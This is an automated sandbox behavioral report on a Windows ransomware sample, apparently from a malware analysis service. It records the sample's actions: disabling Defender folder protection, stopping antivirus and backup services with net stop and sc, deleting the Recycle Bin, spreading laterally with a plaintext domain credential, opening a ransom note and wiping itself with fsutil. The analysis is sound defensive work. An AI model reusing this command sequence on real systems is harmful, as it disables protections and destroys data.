Analysis
-
max time kernel
147s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-es -
resource tags
arch:x64arch:x86image:win10v2004-20240508-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
15-05-2024 18:25
Behavioral task
behavioral1
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win10v2004-20240508-es
Behavioral task
behavioral2
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win10v2004-20240508-es
Behavioral task
behavioral3
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win10v2004-20240508-es
Behavioral task
behavioral4
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win10v2004-20240426-es
General
-
Target
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
-
Size
91KB
-
MD5
be60e389a0108b2871dff12dfbb542ac
-
SHA1
14b4e0bfac64ec0f837f84ab1780ca7ced8d670d
-
SHA256
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d
-
SHA512
6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641
-
SSDEEP
1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI
Malware Config
Signatures
-
Renames multiple (72) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Drops startup file 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Executes dropped EXE 1 IoCs
Processes:
zqdwcykw.exepid process 5764 zqdwcykw.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 452 sc.exe 656 sc.exe 3924 sc.exe 1772 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3988 taskkill.exe 3272 taskkill.exe 2396 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 4472 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exetaskkill.exetaskkill.exetaskkill.exepowershell.exezqdwcykw.exedescription pid process Token: SeDebugPrivilege 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Token: SeDebugPrivilege 3988 taskkill.exe Token: SeDebugPrivilege 3272 taskkill.exe Token: SeDebugPrivilege 2396 taskkill.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeAssignPrimaryTokenPrivilege 5764 zqdwcykw.exe Token: SeIncreaseQuotaPrivilege 5764 zqdwcykw.exe Token: SeImpersonatePrivilege 5764 zqdwcykw.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription pid process target process PID 1516 wrote to memory of 1492 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1516 wrote to memory of 1492 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1516 wrote to memory of 1492 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 1516 wrote to memory of 3124 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3124 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3124 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1348 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1348 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1348 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3452 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3452 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3452 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1952 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1952 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1952 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1376 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1376 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1376 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3544 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3544 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3544 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1260 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1260 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1260 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 872 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 872 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 872 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3688 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3688 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3688 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4420 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4420 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4420 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4752 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4752 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4752 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4672 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4672 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4672 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4416 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4416 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4416 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3368 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3368 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3368 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1504 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1504 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 1504 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3920 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3920 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 3920 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 988 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 988 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 988 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 60 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 60 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 60 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4704 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4704 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4704 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4720 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4720 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 4720 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 1516 wrote to memory of 2680 1516 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"1⤵
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵PID:3124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:5216
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:1348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:5484
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵PID:3452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:5724
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:1952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:5464
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:1376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:5552
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵PID:3544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:5640
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:1260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:5748
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:872
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:5604
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:3688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:5560
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:4420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:5740
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:4752
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:5612
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:4672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:5596
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:4416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:5756
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:3368
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:5832
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:1504
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:5788
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:3920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:5628
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:5816
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:60
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:5772
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:4704
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:5692
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:4720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:5656
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:2680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:5824
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:4456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:5732
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:1132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:5664
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:4968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:5676
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:4772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:5708
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:2584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:5780
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5048
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:5764
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:4124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:5620
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:3568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:5472
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:2748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:5580
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:4576
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:5568
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:5516
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:5648
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:2424
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:5716
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:3788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:5684
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:4684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:5800
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:452
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:1772
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:3924
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:656
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:220
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3F3.bat2⤵PID:1844
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.127.0.132 /USER:EDENFIELD\efadmin P455w0rd2⤵PID:2736
-
-
C:\Users\Admin\AppData\Local\Temp\zqdwcykw.exe"C:\Users\Admin\AppData\Local\Temp\zqdwcykw.exe" \10.127.0.132 -u EDENFIELD\efadmin -p P455w0rd -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:5904
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4472
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:2064
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:444
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2616
-
-
-
